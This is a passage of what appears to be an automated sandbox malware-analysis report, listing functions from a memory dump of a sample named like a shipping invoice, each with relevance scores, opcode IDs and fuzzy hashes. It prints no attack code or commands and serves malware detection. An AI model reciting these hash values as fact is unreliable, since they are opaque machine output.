                                            • Instruction Fuzzy Hash: 5E32FF70A007158FEB29CF6AD8587BEBBF2BFA4304F14415DD4D69B285DB36A842CB50
                                            Function 0112A118 Relevance: .6, Instructions: 591COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f0698a05c7df5ae706be8a9c1517482bb8000bbf4f80356fa1e980acedae0fd
                                            • Instruction ID: 5d43f6d2f9e1749ecf888a252d6bc951c05c7a71db93dc559a835a6a34b5bb91
                                            • Opcode Fuzzy Hash: 8f0698a05c7df5ae706be8a9c1517482bb8000bbf4f80356fa1e980acedae0fd
                                            • Instruction Fuzzy Hash: 4122E5702046B18FEB2DCF2DE054372BBF1AF45300F198459DA968FA86E335E462DB65
                                            Function 01086A50 Relevance: .5, Instructions: 548COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8052268e4868a35f91b5a3c0c2fbd6ac513693366df1ab36ca5e253b5f69d4df
                                            • Instruction ID: 8b2ee4aa9461955ea243b4882213d10cc4762698aadd8cfcac87a393e8e979fd
                                            • Opcode Fuzzy Hash: 8052268e4868a35f91b5a3c0c2fbd6ac513693366df1ab36ca5e253b5f69d4df
                                            • Instruction Fuzzy Hash: 7A32AC70A05205CFDB65DFA9C480BAEBBF1FF48310F1585A9E996AB391DB31E841CB50
                                            Function 010A4A35 Relevance: .4, Instructions: 423COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction ID: e1abc7ab516641901c7ce6f162b1cdd23ba83e873560bca8b04a524f760edb12
                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction Fuzzy Hash: C1F17F74E0021A9FDB55DFE9C590AAEBBF5BF48310F488169E985EB340E7B4E841CB50
                                            Function 0111892B Relevance: .4, Instructions: 386COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8030176929eb4578ac5f18b4f489114ef5d580b7af600fc475cfda36c4d62aa4
                                            • Instruction ID: f05eb1c01ddcef61e2ca04156c1e2093bccb26b7a170d88649bf656a5f725f7a
                                            • Opcode Fuzzy Hash: 8030176929eb4578ac5f18b4f489114ef5d580b7af600fc475cfda36c4d62aa4
                                            • Instruction Fuzzy Hash: 31D1DF72A0061A8BDF0DCF69C841BFEFBB2BF88304F19C179D955A7245E735A9058B60
                                            Function 010865D0 Relevance: .4, Instructions: 383COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cb0bb089b094da124dd28cd9b6db7c31d5d0e50d1a10fa13cb4dad8630c63dd8
                                            • Instruction ID: db3bb7ae27942513bf2b374e6d9e9fd4e4eee5956142b88f24b8f0bcebc916e4
                                            • Opcode Fuzzy Hash: cb0bb089b094da124dd28cd9b6db7c31d5d0e50d1a10fa13cb4dad8630c63dd8
                                            • Instruction Fuzzy Hash: C1E18071508342CFC715EF28C490A6ABBE1FF89314F0689ADE5D987351EB32E945CB92
                                            Function 01078397 Relevance: .4, Instructions: 380COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca22217f7d3f87ed92676c1c034c0757d6580b89fc118c6873cb6012356b2879
                                            • Instruction ID: 4d84cd9ed7390bfcbdddc1385c4cdd22e395f53074dab07fe89bb02377bd7533
                                            • Opcode Fuzzy Hash: ca22217f7d3f87ed92676c1c034c0757d6580b89fc118c6873cb6012356b2879
                                            • Instruction Fuzzy Hash: 7AD1F571A003069BDB14DF28C884BBEB7F5BF58304F05856EE996DB280EB34E954CB54
                                            Function 01108243 Relevance: .3, Instructions: 322COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                            • Instruction ID: 9586e6fdef0c0b2ea838aa107c4c58dd329cf18d12eb5a1132bb928431380de1
                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                            • Instruction Fuzzy Hash: CFB18374E046059FDF2ADF99C940AABBBB5BF84304F14442DAA429B7D1DBB4E905CB10
                                            Function 01090535 Relevance: .3, Instructions: 300COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction ID: 71437b57901b45f8f6907dca8eb96011a6a5e7cd75865f404396a28fca97bfc5
                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction Fuzzy Hash: 16B11631600646EFDF15DB69C864BBEBBFAAF84300F144594E6D2DB285D730E941DB90
                                            Function 010883C0 Relevance: .3, Instructions: 281COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7447ce601568d95a02b538f254c0a32d621cd705347eb2ff869d42338b210c7b
                                            • Instruction ID: 10125e6a9f9b0db2ae65215d5087c912835a3ae2647a0221008822dac6ffe09d
                                            • Opcode Fuzzy Hash: 7447ce601568d95a02b538f254c0a32d621cd705347eb2ff869d42338b210c7b
                                            • Instruction Fuzzy Hash: 69C15774208341CFD7A4DF19C484BAAB7E5BF88304F44896EE9C987291D774E909CFA2
                                            Function 0107C427 Relevance: .3, Instructions: 280COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e28653082149beedd18086169d4dbe980e873ade8e40852d5a63054b1f5c06c
                                            • Instruction ID: 36b46d85a5f7f532b1b880eaa72f466a1ef2854c403130bc89d606d93d00fa8b
                                            • Opcode Fuzzy Hash: 6e28653082149beedd18086169d4dbe980e873ade8e40852d5a63054b1f5c06c
                                            • Instruction Fuzzy Hash: 7BB15F70A002668BEB64CF68C990BADB7F1AF44744F0485E9D58AAB241EB719DC5CB24
                                            Function 010AE5E7 Relevance: .3, Instructions: 278COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5466a5284fcc183487c9d83caf4f7b8a7700320ff3bc15acec4ee7da90ae1eb4
                                            • Instruction ID: 7b97443035c62b600f896e1ab4ec57d69a38c14e468da82256c0139cdfbd3e04
                                            • Opcode Fuzzy Hash: 5466a5284fcc183487c9d83caf4f7b8a7700320ff3bc15acec4ee7da90ae1eb4
                                            • Instruction Fuzzy Hash: 47A13531E0061A9FEB21DBA9C948BAEBBF4BF04754F1501A5EAD0AB2C1D7749D40CBD1
                                            Function 010C0185 Relevance: .3, Instructions: 276COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 589d04687372c730774595f60a01164152fa8714b50a3922e1d7393dd65d0e6b
                                            • Instruction ID: 32f61f31038738a0d347a78093ca981768fd03a9927f2c568683263beb049b4c
                                            • Opcode Fuzzy Hash: 589d04687372c730774595f60a01164152fa8714b50a3922e1d7393dd65d0e6b
                                            • Instruction Fuzzy Hash: 22A1DDB4A0061ADBEB65DF69C891BAEB7F5FF44B18F00402DFA8597285DB34A841CF40
                                            Function 01154500 Relevance: .3, Instructions: 275COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12374e88a14ff0715dbe34dc1df87cec77581500c4a2dda5a1ac48ad623c6326
                                            • Instruction ID: 4d6c524c6357716414a4a6bc9a78ca31df9f026b2180d3c14c57cae134778a1b
                                            • Opcode Fuzzy Hash: 12374e88a14ff0715dbe34dc1df87cec77581500c4a2dda5a1ac48ad623c6326
                                            • Instruction Fuzzy Hash: 2CA1E072604602EFD719DF58C980B9ABBE9FF48704F450528F9A9DBA51E330ED80CB91
                                            Function 01152B57 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                            • Instruction ID: 831c9ef181292863b56831f69dfec05094ba1c0a34ff948849bd12cdc5595e53
                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                            • Instruction Fuzzy Hash: 58B13872E0061ADFDF69CFA9C890AADBBB5FF48310F148129E924A7355D730A941CF90
                                            Function 011060E0 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20d4f818426a2d65d07f411b390f675b1eb9aa4ca4de02b5851c4a46cfa1ec03
                                            • Instruction ID: c5f2e497a5b01d4617884f33a38ed6e2d2da19e651ceaa7959f7e290e3030619
                                            • Opcode Fuzzy Hash: 20d4f818426a2d65d07f411b390f675b1eb9aa4ca4de02b5851c4a46cfa1ec03
                                            • Instruction Fuzzy Hash: 0C91C371D0421AAFDF1ACFA8D890BAEBFB5AF48310F154169E614EB381D774D910DBA0
                                            Function 0109E3F0 Relevance: .3, Instructions: 261COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a14dc5361e17932513f5b1381431b69dad339effaf6ef548fb5fb6988292a168
                                            • Instruction ID: 7a4c90539ed3fb39bb3a9e9d86df5491e3066a9eee4d35e246e30ae9edef2721
                                            • Opcode Fuzzy Hash: a14dc5361e17932513f5b1381431b69dad339effaf6ef548fb5fb6988292a168
                                            • Instruction Fuzzy Hash: 71914131A00616DFEF24DB69C4A4BBEBBE1EF94714F0440A9E9859B390EB34DC41DB91
                                            Function 010D6ACC Relevance: .2, Instructions: 226COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be32b85d7e9e1bbf373dd8753a4af0dd368d0c1eeccbc263bd35954c609a6673
                                            • Instruction ID: 123f200713012659ead705082396f603333962bf9b145a5bcf5e7729c99e16c4
                                            • Opcode Fuzzy Hash: be32b85d7e9e1bbf373dd8753a4af0dd368d0c1eeccbc263bd35954c609a6673
                                            • Instruction Fuzzy Hash: BA818271E007199BDB14CF69D850ABEBBF9FB48710F14852EE885D7640E735D980CB94
                                            Function 0114AB40 Relevance: .2, Instructions: 222COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction ID: 4426da0f87bf68a626bc7c43cfc92417e7287a903c48fe85bdf45c4d12999ab5
                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction Fuzzy Hash: 5581B271A002099FDF1DCF98D890AAEBBF6FF88710F1A8569D9569B344D734E901CB44
                                            Function 010BE284 Relevance: .2, Instructions: 212COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f00e9c92f7125e78666506c01125e5c64cca53ee908dfb3f371e6cedef997f2e
                                            • Instruction ID: 19a0f6be169ee9aa0461f75889c1b2a1346ae7d2cba9a05fe6106dc9aeb7cbde
                                            • Opcode Fuzzy Hash: f00e9c92f7125e78666506c01125e5c64cca53ee908dfb3f371e6cedef997f2e
                                            • Instruction Fuzzy Hash: F0813E71A00609AFDB65CFA9C880BEEBBF9FF48754F14842DE695A7250D730AC45CB50
                                            Function 0109C640 Relevance: .2, Instructions: 206COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 015bf8f4fc649e585afa0f2a26255f26c431442404d4b934b9d437d709358a3c
                                            • Instruction ID: dfbc7fff967a3b5343e7ff4fd2ac9e1c1ee752c6feac3e2c8db7a3c15ecec0e8
                                            • Opcode Fuzzy Hash: 015bf8f4fc649e585afa0f2a26255f26c431442404d4b934b9d437d709358a3c
                                            • Instruction Fuzzy Hash: 6971AB75D04669DFDB258F59C9A07BEBBF0FF58710F14816AE892AB350E3319840DBA0
                                            Function 011347A0 Relevance: .2, Instructions: 202COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f2f136204c9f0577140ed93d4eec33d30b104d601f3de27d5b2f99f92a40d25a
                                            • Instruction ID: 35c0c75473532f55fd760e0f13064b060937c6a5996f3f15ae36e91d88add59d
                                            • Opcode Fuzzy Hash: f2f136204c9f0577140ed93d4eec33d30b104d601f3de27d5b2f99f92a40d25a
                                            • Instruction Fuzzy Hash: 6671B270900605EFEB28CF99CA44A9EBBF8EFD4310F0081AAE655AB75CD7318985CF54
                                            Function 0109260B Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd221c47ab870c97fb6e24ef11f5f66435e3a32009b1e10e4199ea8742a3105b
                                            • Instruction ID: 1c0d892c23d34c4b792c0ebaca053e1ea4ffe008cfba27848e6de4dab774dd50
                                            • Opcode Fuzzy Hash: cd221c47ab870c97fb6e24ef11f5f66435e3a32009b1e10e4199ea8742a3105b
                                            • Instruction Fuzzy Hash: 6071EE31604242AFD752DF28C494B6AF7E5FF88310F0485AAE8D88B752DB34DC46CB91
                                            Function 0110035C Relevance: .2, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                            • Instruction ID: 3ec77d63df2295a48adb234dcd231777e44d5e44c64166cc8fa9bb6b40c4ae10
                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                            • Instruction Fuzzy Hash: 2D718C71E0060AAFCB15DFA9C984BDEBBB8FF48344F104469E545EB290DB74EA01CB90
                                            Function 011162A0 Relevance: .2, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a857373f71b554ce5f8ba2e21cc19bb406b34e49796b31b0f48d48e2fa3334f
                                            • Instruction ID: da1c88926523d76e8c659690fa64fdbbec80956757e8f0cc2eeb587d1f365b28
                                            • Opcode Fuzzy Hash: 5a857373f71b554ce5f8ba2e21cc19bb406b34e49796b31b0f48d48e2fa3334f
                                            • Instruction Fuzzy Hash: 3171F632140B01EFE73ADF18C854F9AFBA6EF44710F154438E259876A4DBB6E944CB50
                                            Function 01088AA0 Relevance: .2, Instructions: 197COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e890bd1fb060cd7f97376587c6980d60860ca18e4441335eafa95df4233f07e
                                            • Instruction ID: 9af6480b08f5eed2bfe3a02df72cee5401d6bf1fbd7c2222733ae841d22549e7
                                            • Opcode Fuzzy Hash: 1e890bd1fb060cd7f97376587c6980d60860ca18e4441335eafa95df4233f07e
                                            • Instruction Fuzzy Hash: EB81BD72A08306CFDB28DF9DC488BADB7F5BB88310F55816ED990AB691C7749D40CB90
                                            Function 0113A250 Relevance: .2, Instructions: 184COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5afa68c34496db138dfdb1a3419a71cb182efad9adcd9b010f0d41af1a4771c4
                                            • Instruction ID: aadcea520a113e8d5d2a8037ab3cc5f580d9759749a11fc902ab0f4eff146825
                                            • Opcode Fuzzy Hash: 5afa68c34496db138dfdb1a3419a71cb182efad9adcd9b010f0d41af1a4771c4
                                            • Instruction Fuzzy Hash: 9651B072504712AFD716DF68D884E9BB7E8EFC4750F054929BA80DB254E770ED04CBA2
                                            Function 01128350 Relevance: .2, Instructions: 161COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c7ed857e89523245d87df624ef334de34e012c46b452f81b8538d810cedba5f6
                                            • Instruction ID: 5d6d2137c6c57275e219c7b658283297c8ea440f092485428421b6798ab62336
                                            • Opcode Fuzzy Hash: c7ed857e89523245d87df624ef334de34e012c46b452f81b8538d810cedba5f6
                                            • Instruction Fuzzy Hash: EA51E070900715DFD729DF6AC880BABFBF8BF94714F10461EE292976A0C7B0A951CB90
                                            Function 010BE443 Relevance: .2, Instructions: 158COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1e7aa68f2313c6845b79d29bb7e80048ab92f4a028c026fdf616fd5856ec685b
                                            • Instruction ID: 8d473e1e78f714d0489163a84db8e4256b9250131e1ca2ceced1ef7c8c8fa98c
                                            • Opcode Fuzzy Hash: 1e7aa68f2313c6845b79d29bb7e80048ab92f4a028c026fdf616fd5856ec685b
                                            • Instruction Fuzzy Hash: E0514871200A499FCB62EF69C9D0EEAB3F9FF14784F400469E69697660DB34E940CB50
                                            Function 01124180 Relevance: .2, Instructions: 156COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 528ee2104b42dac7a2c253d35493a1bdf00af316fe1f1ed809c6362a42f3bb74
                                            • Instruction ID: 3c24f7f71424a1ba147a27ddb3ecab15fd2aa3e20f6da3b7cd6e0b4fb037f9a0
                                            • Opcode Fuzzy Hash: 528ee2104b42dac7a2c253d35493a1bdf00af316fe1f1ed809c6362a42f3bb74
                                            • Instruction Fuzzy Hash: C65187716083268FD758DF29C880AABBBE5FFC8208F44492DF589C7650EB30D915CB96
                                            Function 010A45B1 Relevance: .2, Instructions: 156COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                            • Instruction ID: dd9ae5344e55755c53ef42066300323c417581c3183800fc1051e6dc2d31e81a
                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                            • Instruction Fuzzy Hash: 09518C79E0024AABDF15DB98C840BEEBBF5BF48350F484069EA81EB240D774DD44CBA0
                                            Function 0110E9E0 Relevance: .2, Instructions: 154COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                            • Instruction ID: eb69915529925f319e323427d35eb2ba76bdfd9ccc8b08365c295164a3b4c28c
                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                            • Instruction Fuzzy Hash: 0951DB71D0160AEFDF2AEF95C880BEEBB75AF04324F154A69D912671D0D7B09E40CBA1
                                            Function 01148B28 Relevance: .2, Instructions: 152COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7513e90237344e7c7b42d29bfb239360efe43652ce1c6585d2583b48c52a18c4
